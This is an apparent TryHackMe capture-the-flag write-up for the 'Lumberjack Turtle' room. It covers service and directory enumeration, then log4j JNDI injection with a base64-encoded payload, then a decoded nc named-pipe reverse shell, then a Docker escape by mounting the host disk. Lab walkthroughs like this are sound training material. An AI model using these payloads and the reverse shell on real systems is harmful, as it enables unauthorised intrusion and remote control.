Jan 24
TryHackMe: Lumberjack Turtle
tryhackme Lumberjack Turtle write-up
- Name: Lumberjack Turtle
- Description: No logs, no crime… so says the lumberjack.
- Room: tryhackme.com
- Difficulty: Medium
Services enumeration
Let’s use Nmap to enumerate the services. We discover two ports:
command : nmap -sC -sV <Machine-IP>
Web enumeration
We scan directories with gobuster
command: gobuster dir -u http://10.10.18.151 -w /usr/share/wordlists/dirb/common.txt
There are no properties in these two paths
log4j detection
Check the log4j vulnerabilities
payload: ${jndi:ldap://<IP>:<PORT>}
and
There seems to be this vulnerability
Log4j
JNDI Injection Exploit
send payload
payload : ${jndi:ldap://10.4.44.217:1389/Basic/Command/Base64/cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjQuNDQuMjE3IDQzMjEgPi90bXAvZg==}
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.4.44.217 4321 >/tmp/f
After sending the request…
The first flag
root flag
Docker escape
mount xvda1 in /tmp/esc
command : mount xvda1 /tmp/esc
This is not the original flag and we have to look for the real flag
thank you 🌏🔥
